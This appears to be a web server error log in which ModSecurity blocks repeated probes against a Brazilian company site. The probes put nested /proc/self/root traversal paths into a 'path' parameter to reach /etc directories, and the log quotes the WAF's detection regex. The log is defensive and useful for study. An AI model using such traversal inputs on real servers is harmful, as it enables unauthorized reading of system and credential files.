https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 04:38:57.697466 2026] [:error] [pid 11167:tid 140411632822016] [client 74.7.243.128:47518] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abz5kfHIg5MgXLBnicPULAAAAc0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 04:39:02.784302 2026] [:error] [pid 15826:tid 140411557287680] [client 74.7.243.128:47520] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abz5luoXxyEfFpUF8f9cLAAAAVY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 04:39:07.183530 2026] [:error] [pid 10189:tid 140411574073088] [client 74.7.243.128:48916] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/yum.repos.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abz5mzJ3M9BSuKP7CAbqawAAAJQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 04:39:08.731950 2026] [:error] [pid 11642:tid 140411666392832] [client 74.7.241.31:59614] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abz5nLninkcc-iUj5Ao3SQAAA4k"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 04:39:10.646230 2026] [:error] [pid 10189:tid 140411557287680] [client 74.7.243.128:48926] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/modules-load.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abz5njJ3M9BSuKP7CAbqcQAAAJY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 04:40:13.084969 2026] [:error] [pid 10189:tid 140411574073088] [client 74.7.243.128:60024] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/run/initramfs/state/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abz52zJ3M9BSuKP7CAbqyQAAAJQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/run/initramfs/state/etc
[Fri Mar 20 04:40:58.470556 2026] [:error] [pid 10189:tid 140411574073088] [client 74.7.243.128:56678] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abz6CjJ3M9BSuKP7CAbrDgAAAJQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 04:41:28.396624 2026] [:error] [pid 11167:tid 140411641214720] [client 74.7.243.128:47832] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abz6KPHIg5MgXLBnicPUigAAAcw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 04:41:35.216453 2026] [:error] [pid 11642:tid 140411708356352] [client 74.7.243.128:33652] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/wpa_supplicant"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abz6L7ninkcc-iUj5Ao32wAAA4Q"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 04:41:40.288310 2026] [:error] [pid 21219:tid 140411725141760] [client 74.7.243.128:33658] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abz6NPXLqtnMIWvjpaJycwAAAoI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 04:42:16.933171 2026] [mime_magic:error] [pid 11167:tid 140411666392832] (70014)End of file found: [client 74.7.243.128:43102] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/lib/udev
[Fri Mar 20 04:42:50.352846 2026] [:error] [pid 31215:tid 140411658000128] [client 74.7.243.128:53488] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abz6eQF0L0L-SsrnPo5CaAAAAso"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 04:43:00.679818 2026] [mime_magic:error] [pid 21219:tid 140411674785536] (70014)End of file found: [client 74.7.241.31:32924] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/usr/lib/firmware
[Fri Mar 20 04:43:19.676929 2026] [:error] [pid 7893:tid 140411691570944] [client 74.7.243.128:49154] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/cron.daily"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abz6lxCii7xarUs8iHY_tAAAAgY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 04:43:24.378287 2026] [:error] [pid 11642:tid 140411548894976] [client 74.7.243.128:56396] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abz6nLninkcc-iUj5Ao4PwAAA5c"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 04:43:36.939113 2026] [:error] [pid 7893:tid 140411716749056] [client 74.7.243.128:56412] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/yum.repos.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abz6qBCii7xarUs8iHY_wAAAAgM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 04:43:41.307546 2026] [:error] [pid 7235:tid 140411708356352] [client 74.7.243.128:41248] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abz6rfqxLDW4GITHUkS8UAAAAQQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 04:43:43.293888 2026] [mime_magic:error] [pid 10189:tid 140411666392832] (70014)End of file found: [client 66.249.74.161:55898] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 04:43:53.731888 2026] [:error] [pid 21219:tid 140411582465792] [client 74.7.243.128:40750] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abz6ufXLqtnMIWvjpaJzBwAAApM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 04:43:56.120697 2026] [:error] [pid 31215:tid 140411649607424] [client 74.7.243.128:55448] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abz6vAF0L0L-SsrnPo5CkAAAAss"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 04:43:59.829148 2026] [:error] [pid 7893:tid 140411540502272] [client 74.7.243.128:55464] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abz6vxCii7xarUs8iHY_0gAAAhg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 04:44:13.346978 2026] [:error] [pid 21219:tid 140411616036608] [client 74.7.243.128:57004] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abz6zfXLqtnMIWvjpaJzHgAAAo8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 04:44:38.276376 2026] [:error] [pid 9818:tid 140411574073088] [client 74.7.243.128:55320] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/bash_completion.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abz65l1pVZ5mVmJwsFMKtQAAAFQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 04:45:15.419680 2026] [:error] [pid 21219:tid 140411590858496] [client 74.7.243.128:58454] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/binfmt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abz7C_XLqtnMIWvjpaJzXwAAApI"], referer: 